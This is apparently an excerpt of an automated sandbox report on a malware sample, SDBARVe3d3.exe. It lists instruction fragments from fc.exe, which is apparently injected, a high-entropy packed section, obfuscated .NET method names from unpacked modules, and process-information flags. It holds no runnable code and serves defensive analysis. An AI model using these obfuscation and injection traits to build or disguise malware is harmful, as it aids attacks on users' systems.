                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A0E2D5 pushad ; ret 7_2_02A0E2DD
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A1739E pushfd ; retf 7_2_02A173A0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A1332F push 00000032h; ret 7_2_02A1337C
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A13350 push 00000032h; ret 7_2_02A1337C
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A1511C push eax; iretd 7_2_02A1511D
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A076F4 push cs; iretd 7_2_02A076F5
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A0E42B pushad ; retf 7_2_02A0E43B
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A03404 push eax; retf 7_2_02A03408
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A1B57B push edi; retf 7_2_02A1B59A
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A01BAA push ds; iretd 7_2_02A01BBA
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A01B83 push ecx; iretd 7_2_02A01B8E
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A15BC6 pushfd ; ret 7_2_02A15BCD
                Source: SDBARVe3d3.exeStatic PE information: section name: .text entropy: 7.986248350186217
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, cxomU88yvrxlG3O631.csHigh entropy of concatenated method names: 'qt8me6ntfD', 'lvKmZPglse', 'vRgmBZ8F7V', 'GVkmhlaUPO', 'xJTm74MyLT', 'lJXm22E1yp', 'gthmxB3IJ2', 'zKxm87l8PB', 'Uhym02JD6J', 'DiimOwR8OW'
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, cBGuKWz3BcAoKqGLZk.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uGhT9R0x8w', 'NgsT5gyjGa', 'cEnTdk7bKm', 'q25TIW2Xkt', 'sieTwD317X', 'BmSTTQttZf', 'RUbToIe6Vm'
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, ffHK8AibG0CEXWmIcD.csHigh entropy of concatenated method names: 'KdnIOsjykt', 'Fj9IgNkPNu', 'ToString', 'lXdIZpugRC', 'AykIBZEnUF', 'BLyIhC10Yy', 'QYsI70WJVy', 'YAjI2I4Qea', 'LpYIxlXodE', 'p5tI8GNvpi'
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, EhGNd4jSgFAa6HWLlT.csHigh entropy of concatenated method names: 'A0c2ekqnPm', 'Dyr2BU0AwJ', 'BB927NGYY5', 'LW12xmXfSv', 'Qdt28vPSpY', 'jDy7lut0dv', 'nEE76msfVU', 'tDl7McDTFe', 'xWs7YS7UCc', 'IFs7fNoRSm'
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, oM24m3v77dVBn6meT9.csHigh entropy of concatenated method names: 'AenGBcYQGrVQtWUepEF', 'WmZWZqYHEQwDtqMrcB8', 'Tvl2wAtRJo', 'MrY2TDWPRc', 'PI92oJXJ34', 'N9gmi9Y0sKpow4uRPjO', 'Owa9HmYs7ls7URLSbNI'
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, QBguRVY4EHeVgqdAbE.csHigh entropy of concatenated method names: 'xcAwZVD5ES', 'wAdwBp4ujj', 'ikZwhaAaWq', 'BLSw7Vd9dh', 'HOZw2fTOdW', 'cMgwxbARP9', 'SrDw8jlqQt', 'XFiw0WqaKV', 'dRKwO22XL3', 'A7Gwg5phnX'
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, MpvmG71VPuS5BTnuJH.csHigh entropy of concatenated method names: 'fNfxuVJNKO', 'koLxcb2rjH', 'kOSxLhiPZw', 'NY6x4JjRe1', 'lbUxGiJvjq', 'SUAxAPduAl', 'cCjxp5MEsR', 'QYCxkBNpSb', 'uQAxrjrgw0', 'fBOxa62rjE'
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, BqHydtBU1xMw1lwK6y.csHigh entropy of concatenated method names: 'Dispose', 'x0PEfNjUyc', 'FGCRvAuQio', 'hld883Wkce', 'iKBENguRV4', 'bHeEzVgqdA', 'ProcessDialogKey', 'HE8RDmudw0', 'PDoRECXpu2', 'GAMRRih4Qj'
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, kfIegtaABJXb3ej77W.csHigh entropy of concatenated method names: 'Fhn7GHTuqZ', 'Yfs7poTNAC', 'ToIhbpBUCx', 'DFFhS374HD', 'fUShVOFbrx', 'G6thsQPwsl', 'KpohUBwQGo', 'Q0ghHT9pnm', 'Ptoh1SiF3f', 'XBKhyFTHuC'
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, Th4QjsNvuwRxLAppCo.csHigh entropy of concatenated method names: 'ID4TEltwJp', 'IZ5TmqQMDP', 'W88TtuUfuJ', 'FEbTZBBiyd', 'PCBTBTQ1du', 'dgcT7VNtic', 'WWiT2wCtlq', 'GW5wMPLAv4', 'cMXwYlAfiu', 'LEQwfYM9AW'
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, aCrGcrkf57MYV9WXHR.csHigh entropy of concatenated method names: 'GggBW2kIc4', 'rrXBPIotAB', 'NSVBXqfpom', 'kTnBiEp9Rq', 'zeBBlClTdo', 'QoRB63ot66', 'lC1BMQ1Esh', 'u6BBY3ccrf', 'rYiBfOluPS', 'EXaBN3KtCi'
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, KdOwYg6tpEhwOifEAQ.csHigh entropy of concatenated method names: 'WOpIYOCMEv', 'tDZINmKwM6', 'qLkwD5Meys', 'rhJwErBbSn', 'sPHInEeYSe', 'IjJIQYSpBs', 'KaSIKgJHGd', 'tHfIWvrJFj', 'nmmIPlycjD', 'GmJIXNe1Sc'
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, axs9dNWPurdlAsGsak.csHigh entropy of concatenated method names: 'YIi5yO1p6B', 'q0p5QpHOwu', 'CB15WJygci', 'gue5PEe6L2', 'lt45vtxu0U', 'fl45b9ema9', 'MAd5Ss29PX', 'edH5VfqO8V', 'nFs5sE2HRm', 'hpb5UN6SRb'
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, nUTpBEUGKTIQmITKq5.csHigh entropy of concatenated method names: 'ATNxZQVtUa', 'K9kxhgjwlp', 'uohx2qbGsK', 'x3G2NOffJ9', 'LCo2zXMv4J', 'o4lxDZcIch', 'okIxEd5UEQ', 'cNZxRSMUdl', 'dnmxmc1R3O', 'Skpxt81IUr'
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, VvDp0XEmoigm1ROvj0T.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LigoW9hPpg', 'eocoPnNuEk', 'HsjoX1IGf1', 'rFVoi8ALTW', 'CXbolI51r5', 'hHQo66aRta', 'GRYoM02iTu'
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, o00onWEDoCp79wGHPLb.csHigh entropy of concatenated method names: 'WK4TuioA4a', 'ANMTcZbKq9', 'QZHTL9fkJc', 'WnvT41wF2e', 'egiTGU6RUS', 'TgCTAc9D1I', 'o5RTpkKlry', 'BKfTk0CVwT', 'smgTrkL3xk', 'XhKTaGY5QD'
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, jmghmTrP8gYynY435K.csHigh entropy of concatenated method names: 'tgxh4GQ54u', 'nTvhAmeYH8', 'wJShkygnZb', 'D8MhraCPZG', 'b4Xh50qnJO', 'Uojhd8ETpM', 'rimhIDopOw', 'XiWhw1EoVR', 'z4vhTHl0l7', 'TEvho3FbZt'
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, z7NdA2RPwUWPZCSiOo.csHigh entropy of concatenated method names: 'DRLLhOKYh', 'aE44Uba8H', 'yDaAV2Cag', 'vpUpwTjjF', 'kQkrxkPi3', 'qMaaK9V6h', 'eHt7ygkhxsAteLSFMg', 'FlrSNMA7UNoTSCWBxT', 'FNywjgWHS', 'sL9owtZgK'
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, L1D2pgtcw385WKB39b.csHigh entropy of concatenated method names: 'A1DExCrGcr', 'Y57E8MYV9W', 'rP8EOgYynY', 'A35EgK8fIe', 'ej7E57WrhG', 'Yd4EdSgFAa', 'i0boIlrLumCWR1tb2w', 'YDydSsx8E5fUFKgpdh', 'jHhEEa84wJ', 'rxWEmjlMmU'
                Source: 0.2.SDBARVe3d3.exe.3f1e3b0.2.raw.unpack, JOTERvKfi0N24u0461.csHigh entropy of concatenated method names: 'z1R9kTp0JV', 'eDx9rdFSNZ', 'jUi9juJd1p', 'Emd9v4YFCa', 'bc79SNnJYo', 'aI69V5Xfl3', 'O0L9UhAU47', 'fWm9HWCYpt', 'M1i9y8RiXy', 'Xoc9nx5vHP'
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, cxomU88yvrxlG3O631.csHigh entropy of concatenated method names: 'qt8me6ntfD', 'lvKmZPglse', 'vRgmBZ8F7V', 'GVkmhlaUPO', 'xJTm74MyLT', 'lJXm22E1yp', 'gthmxB3IJ2', 'zKxm87l8PB', 'Uhym02JD6J', 'DiimOwR8OW'
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, cBGuKWz3BcAoKqGLZk.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uGhT9R0x8w', 'NgsT5gyjGa', 'cEnTdk7bKm', 'q25TIW2Xkt', 'sieTwD317X', 'BmSTTQttZf', 'RUbToIe6Vm'
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, ffHK8AibG0CEXWmIcD.csHigh entropy of concatenated method names: 'KdnIOsjykt', 'Fj9IgNkPNu', 'ToString', 'lXdIZpugRC', 'AykIBZEnUF', 'BLyIhC10Yy', 'QYsI70WJVy', 'YAjI2I4Qea', 'LpYIxlXodE', 'p5tI8GNvpi'
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, EhGNd4jSgFAa6HWLlT.csHigh entropy of concatenated method names: 'A0c2ekqnPm', 'Dyr2BU0AwJ', 'BB927NGYY5', 'LW12xmXfSv', 'Qdt28vPSpY', 'jDy7lut0dv', 'nEE76msfVU', 'tDl7McDTFe', 'xWs7YS7UCc', 'IFs7fNoRSm'
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, oM24m3v77dVBn6meT9.csHigh entropy of concatenated method names: 'AenGBcYQGrVQtWUepEF', 'WmZWZqYHEQwDtqMrcB8', 'Tvl2wAtRJo', 'MrY2TDWPRc', 'PI92oJXJ34', 'N9gmi9Y0sKpow4uRPjO', 'Owa9HmYs7ls7URLSbNI'
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, QBguRVY4EHeVgqdAbE.csHigh entropy of concatenated method names: 'xcAwZVD5ES', 'wAdwBp4ujj', 'ikZwhaAaWq', 'BLSw7Vd9dh', 'HOZw2fTOdW', 'cMgwxbARP9', 'SrDw8jlqQt', 'XFiw0WqaKV', 'dRKwO22XL3', 'A7Gwg5phnX'
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, MpvmG71VPuS5BTnuJH.csHigh entropy of concatenated method names: 'fNfxuVJNKO', 'koLxcb2rjH', 'kOSxLhiPZw', 'NY6x4JjRe1', 'lbUxGiJvjq', 'SUAxAPduAl', 'cCjxp5MEsR', 'QYCxkBNpSb', 'uQAxrjrgw0', 'fBOxa62rjE'
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, BqHydtBU1xMw1lwK6y.csHigh entropy of concatenated method names: 'Dispose', 'x0PEfNjUyc', 'FGCRvAuQio', 'hld883Wkce', 'iKBENguRV4', 'bHeEzVgqdA', 'ProcessDialogKey', 'HE8RDmudw0', 'PDoRECXpu2', 'GAMRRih4Qj'
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, kfIegtaABJXb3ej77W.csHigh entropy of concatenated method names: 'Fhn7GHTuqZ', 'Yfs7poTNAC', 'ToIhbpBUCx', 'DFFhS374HD', 'fUShVOFbrx', 'G6thsQPwsl', 'KpohUBwQGo', 'Q0ghHT9pnm', 'Ptoh1SiF3f', 'XBKhyFTHuC'
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, Th4QjsNvuwRxLAppCo.csHigh entropy of concatenated method names: 'ID4TEltwJp', 'IZ5TmqQMDP', 'W88TtuUfuJ', 'FEbTZBBiyd', 'PCBTBTQ1du', 'dgcT7VNtic', 'WWiT2wCtlq', 'GW5wMPLAv4', 'cMXwYlAfiu', 'LEQwfYM9AW'
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, aCrGcrkf57MYV9WXHR.csHigh entropy of concatenated method names: 'GggBW2kIc4', 'rrXBPIotAB', 'NSVBXqfpom', 'kTnBiEp9Rq', 'zeBBlClTdo', 'QoRB63ot66', 'lC1BMQ1Esh', 'u6BBY3ccrf', 'rYiBfOluPS', 'EXaBN3KtCi'
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, KdOwYg6tpEhwOifEAQ.csHigh entropy of concatenated method names: 'WOpIYOCMEv', 'tDZINmKwM6', 'qLkwD5Meys', 'rhJwErBbSn', 'sPHInEeYSe', 'IjJIQYSpBs', 'KaSIKgJHGd', 'tHfIWvrJFj', 'nmmIPlycjD', 'GmJIXNe1Sc'
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, axs9dNWPurdlAsGsak.csHigh entropy of concatenated method names: 'YIi5yO1p6B', 'q0p5QpHOwu', 'CB15WJygci', 'gue5PEe6L2', 'lt45vtxu0U', 'fl45b9ema9', 'MAd5Ss29PX', 'edH5VfqO8V', 'nFs5sE2HRm', 'hpb5UN6SRb'
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, nUTpBEUGKTIQmITKq5.csHigh entropy of concatenated method names: 'ATNxZQVtUa', 'K9kxhgjwlp', 'uohx2qbGsK', 'x3G2NOffJ9', 'LCo2zXMv4J', 'o4lxDZcIch', 'okIxEd5UEQ', 'cNZxRSMUdl', 'dnmxmc1R3O', 'Skpxt81IUr'
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, VvDp0XEmoigm1ROvj0T.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LigoW9hPpg', 'eocoPnNuEk', 'HsjoX1IGf1', 'rFVoi8ALTW', 'CXbolI51r5', 'hHQo66aRta', 'GRYoM02iTu'
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, o00onWEDoCp79wGHPLb.csHigh entropy of concatenated method names: 'WK4TuioA4a', 'ANMTcZbKq9', 'QZHTL9fkJc', 'WnvT41wF2e', 'egiTGU6RUS', 'TgCTAc9D1I', 'o5RTpkKlry', 'BKfTk0CVwT', 'smgTrkL3xk', 'XhKTaGY5QD'
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, jmghmTrP8gYynY435K.csHigh entropy of concatenated method names: 'tgxh4GQ54u', 'nTvhAmeYH8', 'wJShkygnZb', 'D8MhraCPZG', 'b4Xh50qnJO', 'Uojhd8ETpM', 'rimhIDopOw', 'XiWhw1EoVR', 'z4vhTHl0l7', 'TEvho3FbZt'
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, z7NdA2RPwUWPZCSiOo.csHigh entropy of concatenated method names: 'DRLLhOKYh', 'aE44Uba8H', 'yDaAV2Cag', 'vpUpwTjjF', 'kQkrxkPi3', 'qMaaK9V6h', 'eHt7ygkhxsAteLSFMg', 'FlrSNMA7UNoTSCWBxT', 'FNywjgWHS', 'sL9owtZgK'
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, L1D2pgtcw385WKB39b.csHigh entropy of concatenated method names: 'A1DExCrGcr', 'Y57E8MYV9W', 'rP8EOgYynY', 'A35EgK8fIe', 'ej7E57WrhG', 'Yd4EdSgFAa', 'i0boIlrLumCWR1tb2w', 'YDydSsx8E5fUFKgpdh', 'jHhEEa84wJ', 'rxWEmjlMmU'
                Source: 0.2.SDBARVe3d3.exe.3fa5dd0.1.raw.unpack, JOTERvKfi0N24u0461.csHigh entropy of concatenated method names: 'z1R9kTp0JV', 'eDx9rdFSNZ', 'jUi9juJd1p', 'Emd9v4YFCa', 'bc79SNnJYo', 'aI69V5Xfl3', 'O0L9UhAU47', 'fWm9HWCYpt', 'M1i9y8RiXy', 'Xoc9nx5vHP'
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, cxomU88yvrxlG3O631.csHigh entropy of concatenated method names: 'qt8me6ntfD', 'lvKmZPglse', 'vRgmBZ8F7V', 'GVkmhlaUPO', 'xJTm74MyLT', 'lJXm22E1yp', 'gthmxB3IJ2', 'zKxm87l8PB', 'Uhym02JD6J', 'DiimOwR8OW'
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, cBGuKWz3BcAoKqGLZk.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uGhT9R0x8w', 'NgsT5gyjGa', 'cEnTdk7bKm', 'q25TIW2Xkt', 'sieTwD317X', 'BmSTTQttZf', 'RUbToIe6Vm'
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, ffHK8AibG0CEXWmIcD.csHigh entropy of concatenated method names: 'KdnIOsjykt', 'Fj9IgNkPNu', 'ToString', 'lXdIZpugRC', 'AykIBZEnUF', 'BLyIhC10Yy', 'QYsI70WJVy', 'YAjI2I4Qea', 'LpYIxlXodE', 'p5tI8GNvpi'
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, EhGNd4jSgFAa6HWLlT.csHigh entropy of concatenated method names: 'A0c2ekqnPm', 'Dyr2BU0AwJ', 'BB927NGYY5', 'LW12xmXfSv', 'Qdt28vPSpY', 'jDy7lut0dv', 'nEE76msfVU', 'tDl7McDTFe', 'xWs7YS7UCc', 'IFs7fNoRSm'
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, oM24m3v77dVBn6meT9.csHigh entropy of concatenated method names: 'AenGBcYQGrVQtWUepEF', 'WmZWZqYHEQwDtqMrcB8', 'Tvl2wAtRJo', 'MrY2TDWPRc', 'PI92oJXJ34', 'N9gmi9Y0sKpow4uRPjO', 'Owa9HmYs7ls7URLSbNI'
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, QBguRVY4EHeVgqdAbE.csHigh entropy of concatenated method names: 'xcAwZVD5ES', 'wAdwBp4ujj', 'ikZwhaAaWq', 'BLSw7Vd9dh', 'HOZw2fTOdW', 'cMgwxbARP9', 'SrDw8jlqQt', 'XFiw0WqaKV', 'dRKwO22XL3', 'A7Gwg5phnX'
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, MpvmG71VPuS5BTnuJH.csHigh entropy of concatenated method names: 'fNfxuVJNKO', 'koLxcb2rjH', 'kOSxLhiPZw', 'NY6x4JjRe1', 'lbUxGiJvjq', 'SUAxAPduAl', 'cCjxp5MEsR', 'QYCxkBNpSb', 'uQAxrjrgw0', 'fBOxa62rjE'
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, BqHydtBU1xMw1lwK6y.csHigh entropy of concatenated method names: 'Dispose', 'x0PEfNjUyc', 'FGCRvAuQio', 'hld883Wkce', 'iKBENguRV4', 'bHeEzVgqdA', 'ProcessDialogKey', 'HE8RDmudw0', 'PDoRECXpu2', 'GAMRRih4Qj'
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, kfIegtaABJXb3ej77W.csHigh entropy of concatenated method names: 'Fhn7GHTuqZ', 'Yfs7poTNAC', 'ToIhbpBUCx', 'DFFhS374HD', 'fUShVOFbrx', 'G6thsQPwsl', 'KpohUBwQGo', 'Q0ghHT9pnm', 'Ptoh1SiF3f', 'XBKhyFTHuC'
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, Th4QjsNvuwRxLAppCo.csHigh entropy of concatenated method names: 'ID4TEltwJp', 'IZ5TmqQMDP', 'W88TtuUfuJ', 'FEbTZBBiyd', 'PCBTBTQ1du', 'dgcT7VNtic', 'WWiT2wCtlq', 'GW5wMPLAv4', 'cMXwYlAfiu', 'LEQwfYM9AW'
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, aCrGcrkf57MYV9WXHR.csHigh entropy of concatenated method names: 'GggBW2kIc4', 'rrXBPIotAB', 'NSVBXqfpom', 'kTnBiEp9Rq', 'zeBBlClTdo', 'QoRB63ot66', 'lC1BMQ1Esh', 'u6BBY3ccrf', 'rYiBfOluPS', 'EXaBN3KtCi'
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, KdOwYg6tpEhwOifEAQ.csHigh entropy of concatenated method names: 'WOpIYOCMEv', 'tDZINmKwM6', 'qLkwD5Meys', 'rhJwErBbSn', 'sPHInEeYSe', 'IjJIQYSpBs', 'KaSIKgJHGd', 'tHfIWvrJFj', 'nmmIPlycjD', 'GmJIXNe1Sc'
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, axs9dNWPurdlAsGsak.csHigh entropy of concatenated method names: 'YIi5yO1p6B', 'q0p5QpHOwu', 'CB15WJygci', 'gue5PEe6L2', 'lt45vtxu0U', 'fl45b9ema9', 'MAd5Ss29PX', 'edH5VfqO8V', 'nFs5sE2HRm', 'hpb5UN6SRb'
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, nUTpBEUGKTIQmITKq5.csHigh entropy of concatenated method names: 'ATNxZQVtUa', 'K9kxhgjwlp', 'uohx2qbGsK', 'x3G2NOffJ9', 'LCo2zXMv4J', 'o4lxDZcIch', 'okIxEd5UEQ', 'cNZxRSMUdl', 'dnmxmc1R3O', 'Skpxt81IUr'
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, VvDp0XEmoigm1ROvj0T.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LigoW9hPpg', 'eocoPnNuEk', 'HsjoX1IGf1', 'rFVoi8ALTW', 'CXbolI51r5', 'hHQo66aRta', 'GRYoM02iTu'
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, o00onWEDoCp79wGHPLb.csHigh entropy of concatenated method names: 'WK4TuioA4a', 'ANMTcZbKq9', 'QZHTL9fkJc', 'WnvT41wF2e', 'egiTGU6RUS', 'TgCTAc9D1I', 'o5RTpkKlry', 'BKfTk0CVwT', 'smgTrkL3xk', 'XhKTaGY5QD'
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, jmghmTrP8gYynY435K.csHigh entropy of concatenated method names: 'tgxh4GQ54u', 'nTvhAmeYH8', 'wJShkygnZb', 'D8MhraCPZG', 'b4Xh50qnJO', 'Uojhd8ETpM', 'rimhIDopOw', 'XiWhw1EoVR', 'z4vhTHl0l7', 'TEvho3FbZt'
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, z7NdA2RPwUWPZCSiOo.csHigh entropy of concatenated method names: 'DRLLhOKYh', 'aE44Uba8H', 'yDaAV2Cag', 'vpUpwTjjF', 'kQkrxkPi3', 'qMaaK9V6h', 'eHt7ygkhxsAteLSFMg', 'FlrSNMA7UNoTSCWBxT', 'FNywjgWHS', 'sL9owtZgK'
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, L1D2pgtcw385WKB39b.csHigh entropy of concatenated method names: 'A1DExCrGcr', 'Y57E8MYV9W', 'rP8EOgYynY', 'A35EgK8fIe', 'ej7E57WrhG', 'Yd4EdSgFAa', 'i0boIlrLumCWR1tb2w', 'YDydSsx8E5fUFKgpdh', 'jHhEEa84wJ', 'rxWEmjlMmU'
                Source: 0.2.SDBARVe3d3.exe.7bd0000.4.raw.unpack, JOTERvKfi0N24u0461.csHigh entropy of concatenated method names: 'z1R9kTp0JV', 'eDx9rdFSNZ', 'jUi9juJd1p', 'Emd9v4YFCa', 'bc79SNnJYo', 'aI69V5Xfl3', 'O0L9UhAU47', 'fWm9HWCYpt', 'M1i9y8RiXy', 'Xoc9nx5vHP'
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
